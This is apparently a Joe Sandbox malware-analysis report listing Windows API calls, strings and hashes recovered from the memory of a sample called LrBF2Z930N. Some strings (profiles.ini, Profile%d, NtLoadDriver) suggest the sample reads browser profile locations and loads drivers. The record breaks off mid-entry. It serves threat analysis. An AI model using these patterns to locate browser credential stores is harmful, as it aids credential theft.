                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                      • API String ID: 2787044678-1921111777
                                                                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                      • API String ID: 2080319088-3046471546
                                                                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                      APIs
                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                      • memset.MSVCRT ref: 00413292
                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                      • memset.MSVCRT ref: 00413310
                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                      Strings
                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                      • API String ID: 4111938811-1819279800
                                                                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                      • String ID:
                                                                                      • API String ID: 829165378-0
                                                                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00404172
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                      • memset.MSVCRT ref: 00404200
                                                                                      • memset.MSVCRT ref: 00404215
                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                      • API String ID: 2454223109-1580313836
                                                                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+v@Fv@Bv
                                                                                      • API String ID: 667068680-1085305157
                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                      APIs
                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                      • API String ID: 4054529287-3175352466
                                                                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                      • API String ID: 3143752011-1996832678
                                                                                      • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                      • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                      • API String ID: 1607361635-601624466
                                                                                      • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                      • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                      • API String ID: 2000436516-3842416460
                                                                                      • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                      • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                      APIs
                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                      • String ID:
                                                                                      • API String ID: 1043902810-0
                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                      APIs
                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                      • API String ID: 2899246560-1542517562
                                                                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                      Strings
                                                                                      Memory Dump Source
